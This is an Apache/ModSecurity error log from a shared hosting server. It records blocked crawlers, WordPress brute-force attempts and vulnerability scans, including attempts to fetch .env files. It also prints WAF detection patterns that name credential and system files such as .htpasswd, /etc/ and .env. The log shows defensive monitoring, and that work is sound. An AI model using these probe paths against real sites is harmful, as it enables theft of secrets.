[Tue May 26 14:03:15.055967 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaypm_8al1sb-umPtzKAAAADs"]
[Tue May 26 14:03:15.540571 2026] [security2:error] [pid 578581:tid 578730] [client 47.128.17.117:36022] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "freshmindsolutions.com"] [uri "/robots.txt"] [unique_id "ahVay5m_8al1sb-umPtzTAAAABM"]
[Tue May 26 14:03:16.805953 2026] [security2:error] [pid 578581:tid 578818] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVazJm_8al1sb-umPtzYgAAAGs"]
[Tue May 26 14:03:18.014871 2026] [security2:error] [pid 578581:tid 578783] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVazZm_8al1sb-umPtziQAAAEg"]
[Tue May 26 14:03:20.338887 2026] [security2:error] [pid 578581:tid 578797] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVaz5m_8al1sb-umPtz0QAAAFY"]
[Tue May 26 14:03:21.736663 2026] [security2:error] [pid 578581:tid 578771] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa0Zm_8al1sb-umPtz9gAAADw"]
[Tue May 26 14:03:23.922598 2026] [security2:error] [pid 578581:tid 578816] [client 202.141.30.10:65405] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa05m_8al1sb-umPt0RQAAAGk"]
[Tue May 26 14:03:23.922819 2026] [security2:error] [pid 578581:tid 578816] [client 202.141.30.10:65405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa05m_8al1sb-umPt0RQAAAGk"]
[Tue May 26 14:03:25.249230 2026] [security2:error] [pid 578581:tid 578753] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa1Jm_8al1sb-umPt0ZAAAACo"]
[Tue May 26 14:03:25.449348 2026] [autoindex:error] [pid 578581:tid 578727] [client 43.163.4.179:0] AH01276: Cannot serve directory /home2/glorolle/public_html/gldmarsa.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://www.gldmarsa.com
[Tue May 26 14:03:25.735581 2026] [security2:error] [pid 578581:tid 578815] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa1Zm_8al1sb-umPt0eAAAAGg"]
[Tue May 26 14:03:27.646394 2026] [security2:error] [pid 578581:tid 578755] [client 153.75.250.149:27036] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 149.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.christinaspromotions.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahVa15m_8al1sb-umPt0zgAAACw"]
[Tue May 26 14:03:27.829264 2026] [security2:error] [pid 578581:tid 578734] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa15m_8al1sb-umPt0xgAAABc"]
[Tue May 26 14:03:29.503294 2026] [security2:error] [pid 578581:tid 578812] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa2Zm_8al1sb-umPt08gAAAGU"]
[Tue May 26 14:03:29.534374 2026] [security2:error] [pid 578581:tid 578761] [client 188.130.128.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVa2Zm_8al1sb-umPt1AQAAADI"], referer: https://app.simplificaci.com.br/
[Tue May 26 14:03:30.063335 2026] [security2:error] [pid 578581:tid 578763] [client 188.130.128.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVa2Zm_8al1sb-umPt1FgAAADQ"], referer: http://www.anujtradingco.com/top-deejay-headphones/?unapproved=1080029&moderation-hash=0e87fce109a830c284db19e55e399fb4
[Tue May 26 14:03:30.136440 2026] [security2:error] [pid 578581:tid 578777] [client 114.119.138.155:41123] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "greattusker.com"] [uri "/robots.txt"] [unique_id "ahVa2pm_8al1sb-umPt1HQAAAEI"]
[Tue May 26 14:03:31.402982 2026] [security2:error] [pid 578581:tid 578826] [client 57.141.2.50:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa2pm_8al1sb-umPt1MgAAAHM"]
[Tue May 26 14:03:33.084690 2026] [security2:error] [pid 578581:tid 578776] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa3Jm_8al1sb-umPt1aAAAAEE"]
[Tue May 26 14:03:34.295386 2026] [fcgid:warn] [pid 578581:tid 578717] (70014)End of file found: [client 66.132.224.227:21066] mod_fcgid: can't get data from http client
[Tue May 26 14:03:34.846385 2026] [security2:error] [pid 578581:tid 578722] [client 202.141.30.10:65525] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa3pm_8al1sb-umPt1qgAAAAs"]
[Tue May 26 14:03:34.846509 2026] [security2:error] [pid 578581:tid 578722] [client 202.141.30.10:65525] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa3pm_8al1sb-umPt1qgAAAAs"]
[Tue May 26 14:03:35.109688 2026] [security2:error] [pid 578581:tid 578719] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa3pm_8al1sb-umPt1oQAAAAg"]
[Tue May 26 14:03:36.346214 2026] [security2:error] [pid 578581:tid 578797] [client 114.119.152.167:22241] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/cart"] [unique_id "ahVa4Jm_8al1sb-umPt11gAAAFY"], referer: https://haddingtonwines.com/cart?remove_item=09def3ebbc44ff3426b28fcd88c83554
[Tue May 26 14:03:37.036719 2026] [security2:error] [pid 578581:tid 578758] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa4Jm_8al1sb-umPt14gAAAC8"]
[Tue May 26 14:03:37.690124 2026] [security2:error] [pid 578581:tid 578802] [client 139.180.225.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVa4Zm_8al1sb-umPt2AAAAAFs"], referer: https://www.anujtradingco.com/
[Tue May 26 14:03:38.665210 2026] [security2:error] [pid 578581:tid 578770] [client 57.141.2.66:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa4pm_8al1sb-umPt2FQAAADs"]
[Tue May 26 14:03:39.011172 2026] [security2:error] [pid 578581:tid 578723] [client 139.180.225.192:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVa4pm_8al1sb-umPt2LAAAAAw"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1460640&moderation-hash=0844fc7d6ff7c0699f464688a803b5ad
[Tue May 26 14:03:40.740246 2026] [security2:error] [pid 578581:tid 578776] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa5Jm_8al1sb-umPt2XgAAAEE"]
[Tue May 26 14:03:41.089550 2026] [security2:error] [pid 578581:tid 578721] [client 74.7.230.6:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "pcc.co.me"] [uri "/index.php"] [unique_id "ahVa45m_8al1sb-umPt2UgAAAAo"]
[Tue May 26 14:03:41.090875 2026] [security2:error] [pid 578581:tid 578796] [client 74.7.230.6:48084] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "pcc.co.me"] [uri "/robots.txt"] [unique_id "ahVa45m_8al1sb-umPt2UAAAVWQ"]
[Tue May 26 14:03:42.112664 2026] [security2:error] [pid 578581:tid 578781] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa5Zm_8al1sb-umPt2jQAAAEY"]
[Tue May 26 14:03:44.106528 2026] [security2:error] [pid 578581:tid 578797] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa55m_8al1sb-umPt20QAAAFY"]
[Tue May 26 14:03:45.416242 2026] [security2:error] [pid 578581:tid 578833] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa6Jm_8al1sb-umPt3AgAAAHo"]
[Tue May 26 14:03:45.714940 2026] [security2:error] [pid 578581:tid 578818] [client 202.141.30.10:35521] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa6Zm_8al1sb-umPt3FAAAAGs"]
[Tue May 26 14:03:45.715074 2026] [security2:error] [pid 578581:tid 578818] [client 202.141.30.10:35521] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa6Zm_8al1sb-umPt3FAAAAGs"]
[Tue May 26 14:03:47.235116 2026] [security2:error] [pid 578581:tid 578782] [client 152.57.131.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVa65m_8al1sb-umPt3OgAAAEc"], referer: https://www.xllent.in/contact-us/
[Tue May 26 14:03:47.236172 2026] [security2:error] [pid 578581:tid 578719] [client 152.57.131.138:5480] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/captcha.php/"] [unique_id "ahVa65m_8al1sb-umPt3NwAACHs"], referer: https://www.xllent.in/contact-us/
[Tue May 26 14:03:47.939298 2026] [security2:error] [pid 578581:tid 578733] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa65m_8al1sb-umPt3SgAAABY"]
[Tue May 26 14:03:48.113282 2026] [security2:error] [pid 578581:tid 578722] [client 185.191.171.12:25602] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVa7Jm_8al1sb-umPt3YQAAAAs"]
[Tue May 26 14:03:48.113412 2026] [security2:error] [pid 578581:tid 578722] [client 185.191.171.12:25602] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahVa7Jm_8al1sb-umPt3YQAAAAs"]
[Tue May 26 14:03:50.356848 2026] [security2:error] [pid 578581:tid 578764] [client 106.63.26.139:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVa7Zm_8al1sb-umPt3owAANUk"]
[Tue May 26 14:03:50.921329 2026] [security2:error] [pid 578581:tid 578746] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa7pm_8al1sb-umPt3wwAAACM"]
[Tue May 26 14:03:52.133152 2026] [security2:error] [pid 578581:tid 578649] [remote 109.205.180.55:39602] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-login.php"] [unique_id "ahVa75m_8al1sb-umPt37AAAC0M"]
[Tue May 26 14:03:52.186782 2026] [security2:error] [pid 578581:tid 578728] [client 57.141.2.20:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa75m_8al1sb-umPt36AAAABE"]
[Tue May 26 14:03:52.724041 2026] [security2:error] [pid 578581:tid 578684] [remote 74.7.241.58:52626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVa8Jm_8al1sb-umPt4BQAAZ2Y"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/the-events-calendar/common/src/Common/Json_Packer
[Tue May 26 14:03:53.473762 2026] [security2:error] [pid 578581:tid 578799] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa8Zm_8al1sb-umPt4FAAAAFg"]
[Tue May 26 14:03:54.946507 2026] [security2:error] [pid 578581:tid 578827] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa8pm_8al1sb-umPt4PwAAAHQ"]
[Tue May 26 14:03:56.803042 2026] [security2:error] [pid 578581:tid 578772] [client 202.141.30.10:35351] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 10.30.141.202.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa9Jm_8al1sb-umPt4igAAAD0"]
[Tue May 26 14:03:56.803201 2026] [security2:error] [pid 578581:tid 578772] [client 202.141.30.10:35351] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVa9Jm_8al1sb-umPt4igAAAD0"]
[Tue May 26 14:03:57.043411 2026] [security2:error] [pid 578581:tid 578818] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa9Jm_8al1sb-umPt4iQAAAGs"]
[Tue May 26 14:03:57.496004 2026] [security2:error] [pid 578581:tid 578740] [client 110.249.202.2:53968] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "obinnawrites.com"] [uri "/robots.txt"] [unique_id "ahVa9Zm_8al1sb-umPt4oAAAAB0"]
[Tue May 26 14:03:58.672649 2026] [security2:error] [pid 578581:tid 578766] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa9pm_8al1sb-umPt4ugAAADc"]
[Tue May 26 14:03:59.934737 2026] [security2:error] [pid 578581:tid 578829] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa95m_8al1sb-umPt5AgAAAHY"]
[Tue May 26 14:04:01.499092 2026] [security2:error] [pid 578581:tid 578729] [client 106.63.26.155:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "bigpapaairbnbhotel.com"] [uri "/index.php"] [unique_id "ahVa-Zm_8al1sb-umPt5PgAAEnE"]
[Tue May 26 14:04:02.729399 2026] [security2:error] [pid 578581:tid 578788] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa-pm_8al1sb-umPt5XwAAAE0"]
[Tue May 26 14:04:02.820870 2026] [security2:error] [pid 578581:tid 578699] [remote 57.141.2.33:34122] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.2.141.57.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahVa-pm_8al1sb-umPt5bAAAFHU"]
[Tue May 26 14:04:04.220681 2026] [security2:error] [pid 578581:tid 578715] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVa-5m_8al1sb-umPt5kgAAAAQ"]
[Tue May 26 14:04:04.870976 2026] [security2:error] [pid 578581:tid 578731] [client 208.84.100.197:22258] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/backend/.env"] [unique_id "ahVa_Jm_8al1sb-umPt5zAAAABQ"]
[Tue May 26 14:04:04.871174 2026] [security2:error] [pid 578581:tid 578820] [client 208.84.100.197:22244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/app/.env"] [unique_id "ahVa_Jm_8al1sb-umPt5ywAAAG0"]
[Tue May 26 14:04:04.871647 2026] [security2:error] [pid 578581:tid 578730] [client 208.84.100.197:22202] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/.env"] [unique_id "ahVa_Jm_8al1sb-umPt5yQAAABM"]
[Tue May 26 14:04:04.873392 2026] [security2:error] [pid 578581:tid 578828] [client 208.84.100.197:22254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.cuatrodoce.com.mx"] [uri "/api/.env"] [unique_id "ahVa_Jm_8al1sb-umPt5zQAAAHU"]
